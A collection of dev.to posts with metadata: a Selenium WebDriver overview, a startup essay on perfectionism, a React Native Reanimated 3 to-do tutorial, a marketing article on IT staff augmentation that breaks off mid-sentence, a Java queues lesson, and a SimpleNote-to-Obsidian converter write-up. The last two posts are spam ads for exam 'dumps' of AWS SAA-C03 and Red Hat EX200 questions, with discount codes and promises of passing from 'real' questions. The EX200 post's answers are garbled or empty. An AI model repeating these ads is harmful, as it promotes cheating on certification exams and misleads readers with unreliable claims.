- [Selenium Components](#composants-de-selenium)
- [Selenium IDE](#selenium-ide)
- [Selenium RC](#selenium-rc)
- [Selenium WebDriver](#selenium-webdriver)
- [Selenium Grid](#selenium-grid)
- [Advantages and Limitations of Selenium WebDriver](#avantages-et-limites-de-selenium-webdriver)
- [Selenium WebDriver Framework Architecture](#architecture-du-framework-selenium-webdriver)
- [Test Execution Process](#processus-d-exécution-d-un-test)
- [How to Use Selenium WebDriver with Java?](#comment-utiliser-selenium-webdriver-avec-java-?)
## What is Selenium?
Selenium is an open-source set of tools and libraries for cross-browser testing, used to check whether a website behaves consistently across different browsers. It is widely used for automated testing of web applications.
**Compatibility:**
Selenium is compatible with C#, Java, Python, JavaScript, Ruby, and PHP.
**Note:**
- Testers are free to choose the language in which to write their test cases, which makes Selenium very convenient.
- The Selenium code does not have to be written in the same language as the application under test. For example, for an application written in PHP, the test script can be written in Java.
## Selenium Components
The Selenium test suite comprises four main components:

## Selenium IDE:
Selenium IDE, short for `Integrated Development Environment`, is a record-and-playback tool for functional testing.
**Note:** You do not need to learn a scripting language to create functional tests with it.
## Selenium RC:
Selenium RC, short for `Remote Control`, requires knowledge of at least one programming language. Its main libraries are:
- Server
- Client
**Note:** Complex architecture with several limitations.
## Selenium WebDriver
A framework for running cross-browser tests; it is an improved version of Selenium RC.
**Note:**
- Although it is an improved version of Selenium RC, its architecture is completely different.
- You still need to know a programming language to use it.
## Selenium Grid
Used to run test cases simultaneously on different browsers, machines, and operating systems.
**Note:**
- Facilitates cross-browser compatibility testing.
- Two versions: Grid 1 (old version) and Grid 2 (new version).
# Advantages and Limitations of Selenium WebDriver
## Advantages of Selenium WebDriver
1. Multi-browser support:
Selenium WebDriver supports many browsers such as Chrome, Firefox, Safari, Edge, etc. This makes it possible to test web applications across different browsing environments.
2. Direct browser control:
WebDriver interacts directly with the browser, which ensures better test accuracy and reliability compared to other tools that rely on injected scripts.
3. Multi-language support:
Selenium WebDriver lets you write test scripts in several programming languages such as Java, Python, C#, Ruby, JavaScript, etc., giving developers great flexibility.
4. Flexible and powerful API:
The Selenium WebDriver API is rich and supports complex tests, including advanced interactions with web elements and the management of cookies, sessions, and more.
5. Open source and free:
Selenium is an open-source tool, which means it is free and the community constantly contributes to its improvement and evolution.
6. Compatibility with various testing tools:
Selenium WebDriver can be integrated with popular test frameworks such as TestNG, JUnit, and NUnit, as well as with CI/CD tools such as Jenkins, Maven, etc.
7. Distributed and parallel testing:
With Selenium Grid, tests can be run in parallel on several machines and browsers, which reduces the total test execution time.
8. Also compatible with IPhoneDriver, HtmlUnitDriver, and AndroidDriver

## Limitations of Selenium WebDriver
1. Web testing only:
Selenium WebDriver can only be used to test web applications. It does not support desktop applications or native mobile applications.
2. Handling pop-ups and windows:
Selenium can struggle with certain pop-ups and modal windows, especially those generated by the operating system.
3. Dependence on page selectors:
Selenium scripts depend heavily on the structure and selectors of web pages (ID, name, classes, etc.). If the user interface changes frequently, the test scripts must be constantly updated.
4. No support for catching visual errors:
Selenium WebDriver cannot detect visual errors such as alignment issues or incorrect colors. Additional tools such as Applitools Eyes may be needed for visual testing.
5. Learning curve:
Although Selenium is powerful, it can be hard to master for beginners, since it requires an understanding of programming, test automation, and the Selenium API.
6. Performance:
Selenium tests can be slower than those executed by some headless automation tools (without a user interface), especially when screenshots or videos of the tests are needed.
7. Test maintenance:
Because of the dynamic nature of modern web applications, Selenium tests require regular maintenance to ensure they keep working as the application changes.
## Selenium WebDriver Framework Architecture
The WebDriver architecture is made up of four main components:
1. Client Libraries
The client libraries are APIs provided by Selenium for different programming languages. The main client libraries are available for:
- Java
- C#
- Python
- Ruby
- JavaScript (Node.js)
2. JSON Wire Protocol over HTTP
The JSON Wire Protocol is a standardized protocol used by Selenium WebDriver to send commands to browsers. It defines a RESTful API that communicates with browsers using HTTP requests. The client libraries send HTTP requests containing the Selenium commands to the WebDriver servers through this protocol.
3. Browser Drivers
Each browser has its own driver, which acts as a bridge between Selenium WebDriver and the browser. Browser drivers receive JSON Wire Protocol commands from the client libraries and translate them into browser-specific actions.
The browser drivers include:
- **ChromeDriver** for Google Chrome
- **GeckoDriver** for Mozilla Firefox
- **IEDriver** for Internet Explorer
- **EdgeDriver** for Microsoft Edge
- **SafariDriver** for Safari
4. Browsers
The browsers are the actual web applications Selenium interacts with. The browser drivers launch and control browser instances to run the test scripts. Browsers can run in graphical mode or headless (without a user interface) for faster tests.

## Test Execution Process
1. Writing the script: The tester writes test scripts using the Selenium client libraries in the chosen programming language.
2. Sending commands: The client libraries send commands using the JSON Wire Protocol, via HTTP requests, to the corresponding browser driver.
3. Interpreting commands: The browser driver interprets the commands and translates them into browser-specific actions.
4. Executing actions: The browser performs the actions (such as clicking a button, entering text, etc.) and returns the results through the browser driver.
5. Returning results: The results of the actions are sent back through the browser driver to the client libraries, which process them and generate test reports.
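To make step 2 more tangible, here is a sketch of what a "find element" command looks like on the wire. The endpoint shape follows the W3C WebDriver specification (the modern successor of the JSON Wire Protocol); the session id and the `#login-button` selector are hypothetical values for illustration:

```
POST /session/{session-id}/element HTTP/1.1
Content-Type: application/json

{"using": "css selector", "value": "#login-button"}
```

The browser driver answers with a JSON body containing a reference to the element, which the client library then wraps in a `WebElement` object for your script.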
## How to Use Selenium WebDriver with Java?
For the hands-on part, I invite you to read this article: [A practical introduction to testing web applications with Selenium WebDriver and Java.](https://dev.to/laroseikitama/introduction-pratique-aux-tests-dapplications-web-avec-selenium-webdriver-et-java-23ml) | laroseikitama |
1,917,824 | How Founding a Startup is Curing my Perfectionism (1/3) | From childhood, many of us learn to tie our self-worth to our performance. When achievements aren't... | 0 | 2024-07-09T21:45:30 | https://dev.to/ladam0203/how-launching-my-startup-is-curing-my-perfectionism-13-44d7 | startup, mentalhealth, productivity | From childhood, many of us learn to tie our self-worth to our performance. When achievements aren't acknowledged or appreciated appropriately, this mindset can affect our hobbies, projects, career paths, and even relationships throughout life. Launching a startup, (alongside proper therapy,) has been, - I dare to say - vital in healing my perfectionism and fear of failure (and success). Here’s how:
## 1. Launching an MVP - If it's 'perfect,' you're doing it wrong
One of the first challenges in launching a company is creating a Minimum Viable Product (MVP) that's so limited in functionality you might feel embarrassed to show it to anyone. The MVP should be the simplest solution that still addresses the customer's problem, and it needs to be released quickly.
For a perfectionist, this concept can be liberating: "So, the less I polish every detail, the better I am?" It's a counterintuitive notion that can be quite freeing. Here, the pressure of perfect performance is not just relieved but inverted: the more basic and minimal the solution, the better.
## 2. No one knows the best course of action. Only you.
Despite the abundance of advice available, no one can tell you the perfect path for your startup. This forces the perfectionist to realize that only they know what’s best for their business. They must trust their choices, make decisions independently, and be prepared to evaluate, correct, or even abandon those decisions as necessary. This process builds confidence and self-trust, essential for growth.
Making a choice and trusting it is crucial because indecision is the worst option.
## Conclusion
Starting a company puts you in a unique position where no one else knows the best path forward—only you do. This realization, combined with a healthy, ambitious belief in your vision, means you must make decisions and embrace the inevitability of failure.
Ironically, a perfectionist's quest for the perfect business involves navigating the most imperfect path possible. This journey helps heal those childhood wounds, as you learn to appreciate your achievements and thrive on failure.
The startup journey transforms the perfectionist mindset by redefining success and failure, ultimately fostering a healthier, more resilient approach to personal and professional growth.
| ladam0203 |
1,917,825 | Enhancing Your React Native App with Reanimated 3 Using Expo | Animations can significantly enhance the user experience of any mobile application. They make... | 0 | 2024-07-09T21:45:45 | https://devtoys.io/2024/07/08/enhancing-your-react-native-app-with-reanimated-3-using-expo/ | reactnative, animation, mobile, devtoys | ---
canonical_url: https://devtoys.io/2024/07/08/enhancing-your-react-native-app-with-reanimated-3-using-expo/
---
Animations can significantly enhance the user experience of any mobile application. They make interactions feel more intuitive, provide feedback, and create a polished, professional look. However, achieving smooth, high-performance animations in React Native can be challenging due to the JavaScript thread’s limitations. This is where Reanimated 3 comes in. This powerful library allows developers to create complex, performant animations with ease. In this blog post, we’ll explore how to use Reanimated 3 to build high-performance animations in your React Native app using Expo.
---
## Why Reanimated 3?
Reanimated 3 stands out from other animation libraries because it runs animations on the UI thread, not the JavaScript thread. This means animations remain smooth and responsive, even under heavy load or when the JavaScript thread is busy. Reanimated 3 also introduces a new declarative API, making it easier to create and manage animations.
---
## Setting Up Reanimated 3
Setting up Reanimated 3 with Expo is straightforward. Follow the steps below to get started.
---
### Step 1: Create a New Expo Project
First, we need to create a new Expo project using the Reanimated template:
```bash
yarn create expo-app my-app -e with-reanimated
cd my-app
yarn start --reset-cache
```
---
### Creating Basic Animations
Let’s start with a simple animation example: changing the width of a box when a button is pressed.
---
### Sample Animated App Code
The following code is for the App.js file created during the setup:
```javascript
import Animated, {
useSharedValue,
withTiming,
useAnimatedStyle,
Easing,
} from "react-native-reanimated";
import { View, Button } from "react-native";
import React from "react";
export default function AnimatedStyleUpdateExample(props) {
const randomWidth = useSharedValue(10);
const config = {
duration: 500,
easing: Easing.bezier(0.5, 0.01, 0, 1),
};
const style = useAnimatedStyle(() => {
return {
width: withTiming(randomWidth.value, config),
};
});
return (
<View
style={{
flex: 1,
alignItems: "center",
justifyContent: "center",
flexDirection: "column",
}}
>
<Animated.View
style={[
{ width: 100, height: 80, backgroundColor: "black", margin: 30 },
style,
]}
/>
<Button
title="toggle"
onPress={() => {
randomWidth.value = Math.random() * 350;
}}
/>
</View>
);
}
```
---
## 🤔 Looking for a resource to power up your React Native skills? Search no more! Check out this AMAZING hands-on guide. 🔥
### [React and React Native: A complete hands-on guide to modern web and mobile development with React.js](https://amzn.to/4eWJrzU)
---
## 🤓 Practical Tutorial: Building an Animated To-Do List 🛸
Now, let’s build a practical example – an animated to-do list app using Reanimated 3. This app will allow users to add, remove, and reorder tasks with smooth animations.
---
#### ✨ TL;DR – Checkout the GitHub Repo!✨
#### [🔗 ===> judescripts/rn-reanimated: DevToys.io blog tutorial on working with React Native Reanimated 3 (github.com)](https://github.com/judescripts/rn-reanimated)
---
### Step 1: Set Up the Project
Create a new Expo project if you haven’t already:
```bash
yarn create expo-app my-todo-app -e with-reanimated
cd my-todo-app
```
---
### Step 2: Install react-native-gesture-handler
Ensure react-native-gesture-handler is installed:
```bash
yarn add react-native-gesture-handler
```
---
### Step 3: Implement the To-Do List
Create the ToDoList.js component:
```javascript
import React, { useState } from 'react';
import { View, TextInput, Button, StyleSheet, FlatList } from 'react-native';
import TaskItem from './TaskItem';
const ToDoList = () => {
const [tasks, setTasks] = useState([]);
const [task, setTask] = useState('');
const addTask = () => {
if (task.trim()) {
setTasks([...tasks, { id: Date.now().toString(), title: task }]);
setTask('');
}
};
const removeTask = (id) => {
setTasks((prevTasks) => prevTasks.filter((item) => item.id !== id));
};
const renderItem = ({ item }) => (
<TaskItem item={item} removeTask={removeTask} />
);
return (
<View style={styles.container}>
<TextInput
style={styles.input}
value={task}
onChangeText={setTask}
placeholder="Add a task"
/>
<Button title="Add Task" onPress={addTask} />
<FlatList
data={tasks}
renderItem={renderItem}
keyExtractor={(item) => item.id}
/>
</View>
);
};
const styles = StyleSheet.create({
container: {
flex: 1,
padding: 20,
},
input: {
height: 40,
borderColor: 'gray',
borderWidth: 1,
marginBottom: 10,
paddingHorizontal: 10,
},
});
export default ToDoList;
```
### Create the TaskItem.js component using the new Gesture Handler API:
```javascript
import React from 'react';
import { Text, StyleSheet } from 'react-native';
import Animated, { useSharedValue, useAnimatedStyle, withSpring, withTiming, runOnJS } from 'react-native-reanimated';
import { Gesture, GestureDetector } from 'react-native-gesture-handler';
const TaskItem = ({ item, removeTask }) => {
const translateX = useSharedValue(0);
const taskHeight = useSharedValue(70);
const animatedStyle = useAnimatedStyle(() => {
return {
transform: [{ translateX: translateX.value }],
height: taskHeight.value,
opacity: taskHeight.value / 70,
};
});
const panGesture = Gesture.Pan()
.onBegin(() => {
// Initialize context here if needed
})
.onUpdate((event) => {
translateX.value = event.translationX;
})
.onEnd(() => {
if (translateX.value < -150) {
translateX.value = withTiming(-200);
taskHeight.value = withTiming(0, {}, () => {
runOnJS(removeTask)(item.id);
});
} else {
translateX.value = withSpring(0);
}
});
return (
<GestureDetector gesture={panGesture}>
<Animated.View style={[styles.task, animatedStyle]}>
<Text>{item.title}</Text>
</Animated.View>
</GestureDetector>
);
};
const styles = StyleSheet.create({
task: {
height: 70,
backgroundColor: 'lightgrey',
justifyContent: 'center',
paddingHorizontal: 20,
marginBottom: 10,
borderRadius: 10,
},
});
export default TaskItem;
```
### Update your App.js to include the ToDoList component:
```javascript
import 'react-native-gesture-handler';
import 'react-native-reanimated';
import React from 'react';
import { GestureHandlerRootView } from 'react-native-gesture-handler';
import ToDoList from './ToDoList';
export default function App() {
return (
<GestureHandlerRootView style={{ flex: 1 }}>
<ToDoList />
</GestureHandlerRootView>
);
}
```
---
### Running the Project
To run the project, use the following commands based on the platform you want to test:
Start the Expo development server:
```bash
yarn start --reset-cache
```
This will give you options to choose the platform, or you can
Directly Start Run on iOS:
```bash
yarn ios
```
Directly Start Run on Android:
```bash
yarn android
```
---
🫠 Now try to add tasks and swipe to the left to delete and you’ll see some cool animations!🧙🏻♂️
---
## Conclusion
Reanimated 3 provides a powerful and efficient way to create high-performance animations in React Native. By running animations on the UI thread and offering a declarative API, Reanimated 3 ensures smooth and responsive animations, even under heavy load. In this tutorial, we built an animated to-do list app that allows users to add, remove, and reorder tasks with smooth animations. Start experimenting with Reanimated 3 today and take your React Native app’s user experience to the next level!
---
## Next Steps
For an additional challenge, try implementing the ability to reorder tasks within the to-do list. Share your results and any issues you encounter!
---
## 🫠 Did you enjoy this article? Then please visit [DevToys.io](https://devtoys.io) and subscribe to our newsletter so you can stay connected with all the latest dev news, tools and gadgets! ❤️ | 3a5abi |
1,917,826 | IT Staff Augmentation: Empowering Your Team for Success | Introduction In today's rapidly evolving technological landscape, businesses face increasing demands... | 0 | 2024-07-09T21:48:06 | https://dev.to/andrew_morgan_fef3e706051/it-staff-augmentation-empowering-your-team-for-success-271a | webdev, ai, news, discuss | **Introduction**
In today's rapidly evolving technological landscape, businesses face increasing demands to innovate, scale, and stay competitive. To meet these challenges, organizations are turning to IT staff augmentation as a strategic solution. This approach allows companies to enhance their existing teams with skilled professionals, providing the flexibility and expertise needed to tackle complex projects and drive growth. This article explores the concept of IT staff augmentation, its benefits, implementation strategies, and how it can be a game-changer for your organization.
**What is IT Staff Augmentation?**
**Definition and Explanation**
IT staff augmentation is a flexible outsourcing strategy that enables companies to hire tech talent on a temporary basis to fill specific project needs or skill gaps within their existing teams. Unlike traditional hiring methods, staff augmentation allows businesses to quickly scale their workforce without the long-term commitment and overhead costs associated with permanent hires. This approach is particularly useful for projects that require specialized skills or when there's a sudden surge in workload.
**The Evolution of IT Staff Augmentation**
**Historical Context, Modern Trends**
The concept of staff augmentation has evolved significantly over the years. Initially, it was seen as a way to address short-term staffing shortages. However, with the advent of digital transformation, the demand for highly specialized IT skills has surged. Today, IT staff augmentation is not just about filling gaps but about strategically enhancing team capabilities to drive innovation and efficiency. Modern trends indicate a growing reliance on this model, especially in tech-centric industries where agility and expertise are paramount.
**Benefits of IT Staff Augmentation**
**Flexibility, Cost-Efficiency, Access to Expertise**
One of the primary benefits of [IT staff augmentation](https://techgenies.com/it-staff-augmentation-guide/) is flexibility. Companies can scale their teams up or down based on project demands without the complexities of traditional hiring and firing processes. This approach is also cost-efficient, as it reduces the expenses related to recruitment, training, and employee benefits. Furthermore, IT staff augmentation provides access to a global pool of talent, allowing businesses to leverage specialized expertise that may not be available locally. This can significantly enhance the quality and speed of project delivery.
**Challenges in IT Staff Augmentation
Communication Barriers, Integration Issues**
While IT staff augmentation offers numerous advantages, it also comes with its own set of challenges. One common issue is communication barriers, especially when working with remote teams across different time zones. Ensuring seamless integration of augmented staff into existing teams can also be challenging. These professionals need to quickly adapt to the company’s workflows, culture, and tools, which requires effective onboarding and continuous support.
**Types of IT Staff Augmentation
Short-Term, Long-Term, Specialized Augmentation**
There are various types of IT staff augmentation to suit different needs. Short-term augmentation is ideal for projects with tight deadlines or temporary skill gaps. Long-term augmentation, on the other hand, involves integrating professionals into the team for extended periods, often spanning several months or even years. Specialized augmentation focuses on hiring experts with niche skills for highly technical or complex projects. Understanding these types helps businesses choose the right approach based on their specific requirements.
**When to Consider IT Staff Augmentation
Project Overloads, Skill Gaps, Tight Deadlines**
IT staff augmentation is particularly beneficial in situations where there is a sudden spike in project workload, significant skill gaps that need to be filled quickly, or tight deadlines that cannot be met with the current team. It allows businesses to bring in the necessary expertise and manpower to ensure project success without the delays and costs associated with traditional hiring processes. Companies facing digital transformation initiatives often find this model invaluable in meeting their strategic goals.
**How to Implement IT Staff Augmentation
Planning, Vendor Selection, Onboarding Process**
Implementing IT staff augmentation requires careful planning and execution. The first step is to clearly define the project requirements and the specific skills needed. Once this is established, selecting a reliable vendor or staffing partner is crucial. This involves evaluating potential partners based on their expertise, reputation, and ability to provide the necessary talent. The onboarding process should be well-structured to ensure that the augmented staff are integrated smoothly into the team and can start contributing effectively from day one.
**Choosing the Right IT Staff Augmentation Partner
Criteria, Red Flags, Best Practices**
Choosing the right IT staff augmentation partner is critical to the success of the initiative. Key criteria to consider include the partner’s industry experience, the quality of their talent pool, and their ability to provide support and resources throughout the engagement. It's also important to watch out for red flags such as a lack of transparency, poor communication, or a limited understanding of your business needs. Best practices include conducting thorough due diligence, seeking references, and establishing clear communication channels from the outset.
**Cost Considerations
Budgeting, ROI Analysis, Hidden Costs**
While IT staff augmentation can be cost-effective, it's essential to have a clear understanding of the associated costs. This includes not only the direct costs of hiring and compensating the augmented staff but also any hidden costs such as onboarding, training, and management overhead. Conducting a thorough ROI analysis can help businesses determine the financial viability of the augmentation initiative. Proper budgeting and cost management practices are essential to ensure that the project remains within financial constraints and delivers the expected value.
**Impact on In-House Teams
Collaboration, Morale, Knowledge Transfer**
Introducing augmented staff into an existing team can have significant impacts on collaboration, morale, and knowledge transfer. Effective collaboration between in-house and augmented staff is crucial for project success. This requires fostering an inclusive work environment where all team members feel valued and supported. While there might be initial concerns about job security or role clarity among in-house employees, transparent communication and inclusive practices can mitigate these issues. Additionally, augmented staff can bring new perspectives and expertise, facilitating valuable knowledge transfer and skill development within the team.
**Case Studies
Success Stories, Lessons Learned**
Examining case studies of successful IT staff augmentation initiatives can provide valuable insights and lessons learned. These stories often highlight the challenges faced, the strategies implemented to overcome them, and the tangible benefits achieved. By learning from these real-world examples, businesses can better understand how to effectively implement and manage their own staff augmentation projects. Key takeaways from these case studies can inform best practices and help avoid common pitfalls.
**IT Staff Augmentation vs. Traditional Hiring
Speed, Flexibility, Cost Comparison**
Comparing IT staff augmentation with traditional hiring methods reveals several key advantages. Staff augmentation offers greater speed and flexibility, allowing businesses to quickly adapt to changing project demands without the long-term commitment of traditional hires. It also tends to be more cost-effective, as it | andrew_morgan_fef3e706051 |
1,917,827 | Desafio Decodificador - Chanllenge | Check out this Pen I made! | 0 | 2024-07-09T21:49:20 | https://dev.to/veronicacostaui/desafio-decodificador-chanllenge-3e61 | codepen | Check out this Pen I made!
{% codepen https://codepen.io/Veronicacosta-ui/pen/qBzEbXx %} | veronicacostaui |
1,917,828 | Queues and Priority Queues | In a priority queue, the element with the highest priority is removed first. A queue is a first-in,... | 0 | 2024-07-09T21:54:52 | https://dev.to/paulike/queues-and-priority-queues-3aji | java, programming, learning, beginners | In a priority queue, the element with the highest priority is removed first. A _queue_ is a first-in, first-out data structure. Elements are appended to the end of the queue and are removed from the beginning of the queue. In a _priority queue_, elements are assigned priorities. When accessing elements, the element with the highest priority is removed first. This section introduces queues and priority queues in the Java API.
## The Queue Interface
The **Queue** interface extends **java.util.Collection** with additional insertion, extraction, and inspection operations, as shown in Figure below.

The **offer** method is used to add an element to the queue. This method is similar to the **add** method in the **Collection** interface, but the **offer** method is preferred for queues. The **poll** and **remove** methods are similar, except that **poll()** returns **null** if the queue is empty, whereas **remove()** throws an exception. The **peek** and **element** methods are similar, except that **peek()** returns **null** if the queue is empty, whereas **element()** throws an exception.
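To make the contrast concrete, here is a minimal sketch (the class and sample values are my own) showing that **poll()** returns **null** on an empty queue while **remove()** would throw, and that **peek()** inspects the head without removing it:

```java
import java.util.LinkedList;
import java.util.Queue;

public class QueueMethodsDemo {
    // poll() on an empty queue returns null instead of throwing
    public static String pollEmpty() {
        Queue<String> queue = new LinkedList<>();
        return queue.poll(); // remove() here would throw NoSuchElementException
    }

    // peek() looks at the head element without removing it
    public static String offerThenPeek() {
        Queue<String> queue = new LinkedList<>();
        queue.offer("first");
        queue.offer("second");
        return queue.peek(); // queue still contains both elements
    }

    public static void main(String[] args) {
        System.out.println(pollEmpty());     // null
        System.out.println(offerThenPeek()); // first
    }
}
```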
## Deque and LinkedList
The **LinkedList** class implements the **Deque** interface, which extends the **Queue** interface, as shown in Figure below. Therefore, you can use **LinkedList** to create a queue. **LinkedList** is ideal for queue operations because it is efficient for inserting and removing elements from both ends of a list.

**Deque** supports element insertion and removal at both ends. The name _deque_ is short for “double-ended queue” and is usually pronounced “deck.” The **Deque** interface extends **Queue** with additional methods for inserting and removing elements from both ends of the queue. The methods **addFirst(e)**, **removeFirst()**, **addLast(e)**, **removeLast()**, **getFirst()**, and **getLast()** are defined in the **Deque** interface.
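As a small illustration of the double-ended operations (a sketch with my own sample values, using **LinkedList** since it implements **Deque**):

```java
import java.util.Deque;
import java.util.LinkedList;

public class DequeDemo {
    public static String demo() {
        Deque<String> deque = new LinkedList<>();
        deque.addLast("B");                 // deque is [B]
        deque.addFirst("A");                // deque is [A, B]
        deque.addLast("C");                 // deque is [A, B, C]
        String first = deque.removeFirst(); // "A"; deque is [B, C]
        String last = deque.removeLast();   // "C"; deque is [B]
        return first + last + deque.getFirst(); // "ACB"
    }

    public static void main(String[] args) {
        System.out.println(demo()); // ACB
    }
}
```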
The code below shows an example of using a queue to store strings. Line 6 creates a queue using **LinkedList**. Four strings are added to the queue in lines 7–10. The **size()** method defined in the **Collection** interface returns the number of elements in the queue (line 12). The **remove()** method retrieves and removes the element at the head of the queue (line 13).

The **PriorityQueue** class implements a priority queue, as shown in Figure below. By default, the priority queue orders its elements according to their natural ordering using **Comparable**. The element with the least value is assigned the highest priority and thus is removed from the queue first. If there are several elements with the same highest priority, the tie is broken arbitrarily. You can also specify an ordering using **Comparator** in the constructor **PriorityQueue(initialCapacity, comparator)**.

The code below shows an example of using a priority queue to store strings. Line 7 creates a priority queue for strings using its no-arg constructor. This priority queue orders the strings using their natural order, so the strings are removed from the queue in increasing order. Line 18 creates a priority queue using the comparator obtained from **Collections.reverseOrder()**, which orders the elements in reverse order, so the strings are removed from the queue in decreasing order.
 | paulike |
1,917,829 | Building A SimpleNote to Obsidian notes converter | Building A SimpleNote to Obsidian notes converter See it in... | 0 | 2024-07-09T21:57:06 | https://dev.to/ayush_saran/building-a-simplenote-to-obsidian-notes-converter-33j9 | showdev, simplenote, obsidian, converter | # Building A SimpleNote to Obsidian notes converter
# See it in action:
https://simplenote-to-obsidian.fly.dev/
[](https://simplenote-to-obsidian.fly.dev/)
# WHY?
I like quickly jotting down notes in SimpleNote, but after seeing [Obsidian](https://obsidian.md) pop up all over the web I was curious and decided to try it out. And I liked it: the ability to add more structure and link documents seemed like a great way to build up to a longer post by referencing snippets and sections that I had saved as unrelated notes in SimpleNote.
## The problem
SimpleNote saves notes in .txt files, and while it's easy to export out of SimpleNote, there's no direct way to transfer the notes over to Obsidian.
I tried looking into the official migration guide at:
https://help.obsidian.md/import
I even tried looking for community plugins that would handle this:
https://obsidian.md/plugins
It seemed bizarre that there was no official way to import from SimpleNote, which is quite a popular platform. Then I stumbled across this Python script from https://github.com/philgyford/simplenote-to-obsidian/blob/main/convert_notes.py and decided to build my own web version in JavaScript.
# HOW IT WORKS
1. Upload the JSON file from SimpleNote that contains an export of all the notes
2. Parse each note and convert the Tags into Obsidian compatible #Tags
3. Export this updated note into its own .md file
4. Change the modified date to reflect the date from the original SimpleNote file
5. Save these .md notes into a folder
6. Create a Zip for export that can be downloaded to import into Obsidian
# The stack
Usually I'd build this in Next.js and host it on Vercel, but having recently run into an API route timeout I knew that Vercel allows only ~5-10 seconds for script execution in API routes (on the Hobby tier). I was worried that parsing the notes could take some time for larger collections, so I built this as a simple Node + Express app and decided to try hosting it on Fly.io.
It wasn't AS easy as connecting a GitHub repo to Vercel, but within 20 mins I had my account set up on Fly.io and the app deployed.
# Challenges
### File Upload in Express v4
I just couldn't get the uploaded file through to the controller. The POST data from the form looked okay on the front-end and all my code looked okay on the Express end, but any calls to req.body came up as an empty object {}!
I racked my brain over this for an hour before stumbling across a StackOverflow post where a kind poster pointed out that file uploads in forms are no longer handled by Express as of v4 and require an external library. I went with 'express-fileupload': https://www.npmjs.com/package/express-fileupload
### Creation Date
Node's 'fs' module has a function to update the 'Modified' and 'Last Accessed' dates that works across platforms, but changing the 'Created At' date is trickier.
The fs.futimesSync function does not handle 'Created At' dates:
https://www.geeksforgeeks.org/node-js-fs-futimessync-method/?ref=lbp
I did stumble upon https://github.com/baileyherbert/utimes, a cross-platform native addon to change the btime, mtime, and atime of files in Node.js.
It seems to fix the issue for Win + Mac systems, so I might give it a try for the next iteration of this tool.
# Finally...
And that's it. I was finally able to build the tool and test it and it works great!
I was able to import all my SimpleNote data into Obsidian easily and the tags were preserved
# See it in action:
https://simplenote-to-obsidian.fly.dev/
[](https://simplenote-to-obsidian.fly.dev/)
Give it a go and let me know if it helps you.
# + BONUS
I've shared the tool as a GitHub repo for other people to mess around with:
https://github.com/ayushsaranGithuB/simplenote-to-obsidian
Comments, criticisms, suggestions are welcome
Please file an issue if you find a bug: https://github.com/ayushsaranGithuB/simplenote-to-obsidian/issues | ayush_saran |
1,917,830 | "Amazon SAA-C03 PDF Dumps: Your Ultimate Guide to Achieve Success Effortlessly With CertifieDumps" | "Amazon SAA-C03 PDF Dumps: Your Ultimate Guide to Achieve Success Effortlessly With... | 0 | 2024-07-09T21:58:15 | https://dev.to/ella_henry_990efd16d535c5/amazon-saa-c03-pdf-dumps-your-ultimate-guide-to-achieve-success-effortlessly-with-certifiedumps-4bah | dumps, examdumps, saac03 |

"Amazon SAA-C03 PDF Dumps: Your Ultimate Guide to Achieve Success Effortlessly With CertifieDumps"
Finding success in the ever-evolving IT industry is not feasible without the Amazon Associate & AWS Certified Solutions Architect Associate SAA-C03 certification. Luckily, with the help of Certifiedumps, achieving this certification can be a smooth journey. With their genuine and up-to-date Amazon SAA-C03 exam dumps, your path to excellence begins!
"This unique course is designed for various professionals ranging from Students preparing for the Amazon Web Services Certified (AWS Certified) Solutions Architect Associate (SAA-C03) Exam, Amazon Web Services (AWS) Engineers, Azure Engineers, Cloud Architects, Cloud Engineers, DevOps Engineers, GCP Engineers, Infrastructure Engineers, to Solution Architects, Security Engineers, and much more!
''The best part? No prior knowledge is required - you can pass the exam solely based on our practice test exams."
Regardless of your device or operating system, Certifiedumps is compatible and user-friendly. Its web-based practice test, which includes all features of the desktop practice exam program, runs smoothly on Chrome, Firefox, Opera, Safari, and Internet Explorer, offering the flexibility to cater to individuals using Mac, iOS, Linux, Android, or Windows.
"And this is just in - with the coupon code FLAT25OFF, you can now receive a 25% discount. Moreover, Certifiedumps offers free updates for up to 90 days so that you're always on track with the current exam pattern. If you need more than that, their 100% free Amazon Associate & AWS Certified Solutions Architect Associate SAA-C03 exam upgrades will ensure your success in the first attempt. So wait no more, get started with Certifiedumps and watch your career soar!"
TO VISIT SITE 🕳 https://www.certifiedumps.com/amazon/saa-c03-dumps.html | ella_henry_990efd16d535c5 |
1,917,831 | Unlock Instant Success: Exclusive Top Picks for Refreshed EX200 Dumps Exam Questions 2024/2025 | Are you craving to conquer the Red Hat exam on your first attempt? Leverage the authentic... | 0 | 2024-07-09T22:01:46 | https://dev.to/ella_henry_990efd16d535c5/unlock-instant-success-exclusive-top-picks-for-refreshed-ex200-dumps-exam-questions-20242025-3pji |

Are you craving to conquer the Red Hat exam on your first attempt? Leverage the authentic CertifiesDumps EX200 dumps (questions). By validating your knowledge and skills with the EX200 certification exam, you can secure well-paying jobs and promotions in today's fiercely competitive IT job market. The path to preparing for the EX200 certification test can indeed be daunting. Many fall short of passing the RHCSA EX200 examination because they fail to use the most updated RHCSA EX200 questions.
The good news? CertifiesDumps presents you with RedHat EX200 accurate and latest questions available in three modes: desktop RHCSA EX200 practice exam software, web-based EX200 practice exam, and EX200 PDF. These EX200 questions are not only genuine but also firmly anchored in the syllabus.
CertifiesDumps, with our Red Hat Certified System Administrator EX200 actual test questions, has aided hundreds in acing the RedHat EX200 exam with flying colors. Join the ranks of those certified on the first try using our real EX200 questions.
**EX200 Real Dumps Questions Answers for Certification Success**

**RedHat EX200 Sample Questions**

**Question # 1** — Part 2 (on Node2 Server), Task 8 [Tuning System Performance]: Set your server to use the recommended tuned profile.

Answer (see the explanation below):

```
[root@node2 ~]# tuned-adm list
[root@node2 ~]# tuned-adm active
Current active profile: virtual-guest
[root@node2 ~]# tuned-adm recommend
virtual-guest
[root@node2 ~]# tuned-adm profile virtual-guest
[root@node2 ~]# tuned-adm active
Current active profile: virtual-guest
[root@node2 ~]# reboot
[root@node2 ~]# tuned-adm active
Current active profile: virtual-guest
```

**Question # 2** — Part 2 (on Node2 Server), Task 2 [Installing and Updating Software Packages]: Configure your system to use this location as a default repository:
http://utility.domain15.example.com/BaseOS
http://utility.domain15.example.com/AppStream
Also configure your GPG key to use this location:
http://utility.domain15.example.com/RPM-GPG-KEY-redhat-release

Answer: See the explanation below.

**Question # 3** — A YUM source has been provided at http://instructor.example.com/pub/rhel6/dvd. Configure your system so it can be used normally.

Answer: See the explanation below.

